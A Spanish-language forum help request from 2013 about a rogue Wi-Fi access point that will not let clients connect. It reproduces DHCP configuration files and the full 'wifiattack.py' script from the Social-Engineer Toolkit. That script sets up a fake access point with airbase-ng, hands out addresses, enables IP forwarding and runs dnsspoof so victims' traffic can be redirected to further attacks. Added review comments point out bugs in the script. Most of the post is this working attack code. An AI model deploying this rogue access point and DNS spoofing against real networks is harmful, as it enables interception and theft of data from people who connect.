SET - Wireless Access Point Attack Vector

Iniciado por Cr4id3r, 18 Abril 2013, 22:50 PM


Cr4id3r

Hola, buenas a todos chicos, verán, tengo un pequeño problemilla creando mi AP: la cosa es que inicio el servicio correctamente y puedo ver perfectamente la red, pero a la hora de conectarme con un equipo, este se queda intentando establecer la conexión y de ahí no pasa. Estas son las configuraciones que tengo:

dhcpd.conf

#
# Sample configuration file for ISC dhcpd for Debian
#
#

# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;

# option definitions common to all supported networks...
option domain-name "example.org";
option domain-name-servers ns1.example.org, ns2.example.org;

default-lease-time 600;
max-lease-time 7200;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# No service will be given on this subnet, but declaring it helps the
# DHCP server to understand the network topology.

subnet 192.168.1.0 netmask 255.255.255.0 {
option domain-name "mylan";
option domain-name-servers 192.168.1.1;
option routers 192.168.1.1;
option subnet-mask 255.255.255.0;
range 192.168.1.100 192.168.1.200;
}

# This is a very basic subnet declaration.

#subnet 10.254.239.0 netmask 255.255.255.224 {
#  range 10.254.239.10 10.254.239.20;
#  option routers rtr-239-0-1.example.org, rtr-239-0-2.example.org;
#}

# This declaration allows BOOTP clients to get dynamic addresses,
# which we don't really recommend.

#subnet 10.254.239.32 netmask 255.255.255.224 {
#  range dynamic-bootp 10.254.239.40 10.254.239.60;
#  option broadcast-address 10.254.239.31;
#  option routers rtr-239-32-1.example.org;
#}

# A slightly different configuration for an internal subnet.
#subnet 10.5.5.0 netmask 255.255.255.224 {
#  range 10.5.5.26 10.5.5.30;
#  option domain-name-servers ns1.internal.example.org;
#  option domain-name "internal.example.org";
#  option routers 10.5.5.1;
#  option broadcast-address 10.5.5.31;
#  default-lease-time 600;
#  max-lease-time 7200;
#}

# Hosts which require special configuration options can be listed in
# host statements.   If no address is specified, the address will be
# allocated dynamically (if possible), but the host-specific information
# will still come from the host declaration.

#host passacaglia {
#  hardware ethernet 0:0:c0:5d:bd:95;
#  filename "vmunix.passacaglia";
#  server-name "toccata.fugue.com";
#}

# Fixed IP addresses can also be specified for hosts.   These addresses
# should not also be listed as being available for dynamic assignment.
# Hosts for which fixed IP addresses have been specified can boot using
# BOOTP or DHCP.   Hosts for which no fixed address is specified can only
# be booted with DHCP, unless there is an address range on the subnet
# to which a BOOTP client is connected which has the dynamic-bootp flag
# set.
#host fantasia {
#  hardware ethernet 08:00:07:26:c0:a5;
#  fixed-address fantasia.fugue.com;
#}

# You can declare a class of clients and then do address allocation
# based on that.   The example below shows a case where all clients
# in a certain class get addresses on the 10.17.224/24 subnet, and all
# other clients get addresses on the 10.0.29/24 subnet.

#class "foo" {
#  match if substring (option vendor-class-identifier, 0, 4) = "SUNW";
#}

#shared-network 224-29 {
#  subnet 10.17.224.0 netmask 255.255.255.0 {
#    option routers rtr-224.example.org;
#  }
#  subnet 10.0.29.0 netmask 255.255.255.0 {
#    option routers rtr-29.example.org;
#  }
#  pool {
#    allow members of "foo";
#    range 10.17.224.10 10.17.224.250;
#  }
#  pool {
#    deny members of "foo";
#    range 10.0.29.10 10.0.29.230;
#  }
#}







isc-dhcp-server
# Defaults for isc-dhcp-server initscript
# sourced by /etc/init.d/isc-dhcp-server
# installed at /etc/default/isc-dhcp-server by the maintainer scripts

#
# This is a POSIX shell fragment
#

# Path to dhcpd's config file (default: /etc/dhcp/dhcpd.conf).
#DHCPD_CONF=/etc/dhcp/dhcpd.conf

# Path to dhcpd's PID file (default: /var/run/dhcpd.pid).
#DHCPD_PID=/var/run/dhcpd.pid

# Additional options to start dhcpd with.
# Don't use options -cf or -pf here; use DHCPD_CONF/ DHCPD_PID instead
#OPTIONS=""

# On what interfaces should the DHCP server (dhcpd) serve DHCP requests?
# Separate multiple interfaces with spaces, e.g. "eth0 eth1".
INTERFACES="wlan0 mon0"







wifiattack.py
#!/usr/bin/env python
##############################################
#
# This is a basic setup for an access point
# attack vector in set.
#
##############################################

import sys
import os
import subprocess
import re
import pexpect
import time
from src.core.setcore import *
from src.core.menu import text
from config.set_config import AIRBASE_NG_PATH as airbase_path
from config.set_config import ACCESS_POINT_SSID as access_point
from config.set_config import AP_CHANNEL as ap_channel
from config.set_config import DNSSPOOF_PATH as dnsspoof_path

# Flat script: it runs top to bottom with no functions. Almost every step is a
# system side effect (config file writes, interface changes, spawned daemons),
# so the order of statements matters throughout.
# NOTE(review): the script relies on Python 2 builtins (raw_input, file) and
# will not run unchanged under Python 3.

# Abort early if the dnsspoof binary configured in set_config is not present.
if not os.path.isfile(dnsspoof_path):
    print_warning("DNSSpoof was not found. Please install or correct path in set_config. Exiting....")
    exit_set()

# Fall back to the copy bundled with SET when the configured airbase-ng path
# does not exist.
if not os.path.isfile(airbase_path):
    airbase_path = "src/wireless/airbase-ng"
    print_info("using SET's local airbase-ng binary")

# Interactive step: the operator is dropped into nano to edit a file by hand.
# The editor is launched via shell=True and nothing checks its exit status or
# whether the file was actually modified.
# NOTE(review): the prompts describe an INTERFACES="..." edit, but the path
# opened below is dhcpd.conf; the two do not obviously refer to the same
# file — confirm which file is meant.
print_info("For this attack to work properly, we must edit the dhcp3-server file to include our wireless interface.")
print_info("""This will allow dhcp3 to properly assign IPs. (INTERFACES="at0")""")
print("")
print_status("SET will now launch nano to edit the file.")
print_status("Press ^X to exit nano and don't forget to save the updated file!")
print_warning("If you receive an empty file in nano, please check the path of your dhcp3-server file!")
return_continue()
subprocess.Popen("nano /etc/dhcp/dhcpd.conf", shell=True).wait()

# DHCP SERVER CONFIG HERE
# Two ready-made dhcpd configurations (10.0.0.0/24 and 192.168.1.0/24). The
# menu below picks one, and it is written out to src/program_junk/dhcp.conf.
dhcp_config1 = ("""
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
    range 10.0.0.100 10.0.0.254;
    option domain-name-servers 8.8.8.8;
    option routers 10.0.0.1;
    option broadcast-address 10.0.0.255;
    default-lease-time 600;
    max-lease-time 7200;
}
""")

dhcp_config2 = ("""
ddns-update-style none;
authoritative;
log-facility local7;
subnet 192.168.1.0 netmask 255.255.255.0 {
    range 192.168.1.100 192.168.1.254;
    option domain-name-servers 8.8.8.8;
    option routers 192.168.1.1;
    option broadcast-address 192.168.1.255;
    default-lease-time 600;
    max-lease-time 7200;
}
""")

# Menu selection. An empty answer is mapped to option "1" below.
show_fakeap_dhcp_menu = create_menu(text.fakeap_dhcp_text, text.fakeap_dhcp_menu)
fakeap_dhcp_menu_choice = raw_input(setprompt(["8"], ""))

if fakeap_dhcp_menu_choice != "":
    # check_length is a SET helper; its exact return type is not visible here,
    # hence the explicit str() conversion that follows.
    fakeap_dhcp_menu_choice = check_length(fakeap_dhcp_menu_choice,2)
    # convert it to a string
    fakeap_dhcp_menu_choice = str(fakeap_dhcp_menu_choice)

if fakeap_dhcp_menu_choice == "":
    fakeap_dhcp_menu_choice = "1"

# NOTE(review): dhcptun is assigned only in the "1" and "2" branches. Any
# other answer that is not "exit" falls through to the `dhcptun==1` /
# `dhcptun==2` checks further down with the name unbound (NameError).
if fakeap_dhcp_menu_choice == "1":
    # writes the dhcp server out
    print_status("Writing the dhcp configuration file to src/program_junk")
    filewrite=file("src/program_junk/dhcp.conf", "w")
    filewrite.write(dhcp_config1)
    # close the file
    filewrite.close()
    # remembered so the matching at0 address is configured below
    dhcptun = 1

if fakeap_dhcp_menu_choice == "2":
    # writes the dhcp server out
    print_status("Writing the dhcp configuration file to src/program_junk")
    filewrite=file("src/program_junk/dhcp.conf", "w")
    filewrite.write(dhcp_config2)
    # close the file
    filewrite.close()
    # remembered so the matching at0 address is configured below
    dhcptun = 2

if fakeap_dhcp_menu_choice == "exit":
    exit_set()

# Free-text interface name; it is not validated and is interpolated into a
# shell command string below.
interface = raw_input(setprompt(["8"], "Enter the wireless network interface (ex. wlan0)"))

# place wifi interface into monitor mode
print_status("Placing card in monitor mode via airmon-ng..")

# if we have it already installed then don't use the SET one
# NOTE(review): only /usr/local/sbin is probed; an airmon-ng installed
# anywhere else on PATH still falls through to the bundled copy.
if os.path.isfile("/usr/local/sbin/airmon-ng"):
    airmonng_path = "/usr/local/sbin/airmon-ng"

if not os.path.isfile("/usr/local/sbin/airmon-ng"):
    airmonng_path = "src/wireless/airmon-ng"

# The operator-supplied interface name goes straight into a shell pipeline
# (shell=True). The pipeline extracts the interface name from airmon-ng's
# "monitor mode enabled on ..." line; moniface holds whatever the pipeline
# printed (presumably including a trailing newline) and is empty if that
# line never appeared — nothing checks for that case.
monproc = subprocess.Popen("%s start %s |  grep \"monitor mode enabled on\" | cut -d\" \" -f5 | sed -e \'s/)$//\'" % (airmonng_path,interface), shell=True, stdout=subprocess.PIPE)
moniface=monproc.stdout.read()
monproc.wait()

# execute modprobe tun
subprocess.Popen("modprobe tun", shell=True).wait()

# create a fake access point
# Kept in `child` so the pexpect session (and the process) stays alive. The
# fixed 15-second sleep is the only synchronisation: nothing verifies that
# airbase-ng started or that the at0 interface exists before it is
# configured below.
print_status("Spawning airbase-ng in a seperate child thread...")
child = pexpect.spawn('%s -P -C 20 -e "%s" -c %s %s' % (airbase_path,access_point,ap_channel,moniface))
print_info("Sleeping 15 seconds waiting for airbase-ng to complete...")
time.sleep(15)

# bring the interface up
# Each branch mirrors the subnet of the dhcp_config written earlier. Every
# command runs via shell=True and its exit status is discarded.
if dhcptun==1:
    print_status("Bringing up the access point interface...")
    subprocess.Popen("ifconfig at0 up", shell=True).wait()
    subprocess.Popen("ifconfig at0 10.0.0.1 netmask 255.255.255.0", shell=True).wait()
    subprocess.Popen("ifconfig at0 mtu 1400", shell=True).wait()
    subprocess.Popen("route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1", shell=True).wait()

if dhcptun==2:
    print_status("Bringing up the access point interface...")
    subprocess.Popen("ifconfig at0 up", shell=True).wait()
    subprocess.Popen("ifconfig at0 192.168.1.1 netmask 255.255.255.0", shell=True).wait()
    subprocess.Popen("ifconfig at0 mtu 1400", shell=True).wait()
    subprocess.Popen("route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1", shell=True).wait()

# starts a dhcp server
# NOTE(review): the init script is invoked with dhcpd-style arguments
# (-cf <file> at0); whether that init script accepts them is not
# established here — confirm against the target distribution.
print_status("Starting the DHCP server on a seperate child thread...")
child2 = pexpect.spawn("/etc/init.d/isc-dhcp-server -cf src/program_junk/dhcp.conf at0")

# starts ip_forwarding
# NOTE(review): pexpect.spawn executes the command directly rather than
# through a shell, so the ">" here is presumably handed to echo as a literal
# argument instead of performing a redirection — confirm; nothing reads the
# value back afterwards.
print_status("Starting IP Forwarding...")
child3 = pexpect.spawn("echo 1 > /proc/sys/net/ipv4/ip_forward")

# start dnsspoof
# Bound to at0 and kept in child4; no hosts file argument is given here.
print_status("Starting DNSSpoof in a seperate child thread...")
child4 = pexpect.spawn("%s -i at0" % (dnsspoof_path))

# None of child/child2/child3/child4 is waited on or stopped in this script;
# teardown is left to the separate menu the last message points at.
print_status("SET has finished creating the attack. If you experienced issues please report them.")
print_status("Now launch SET attack vectors within the menus and have a victim connect via wireless.")
print_status("Be sure to come back to this menu to stop the services once your finished.")
return_continue()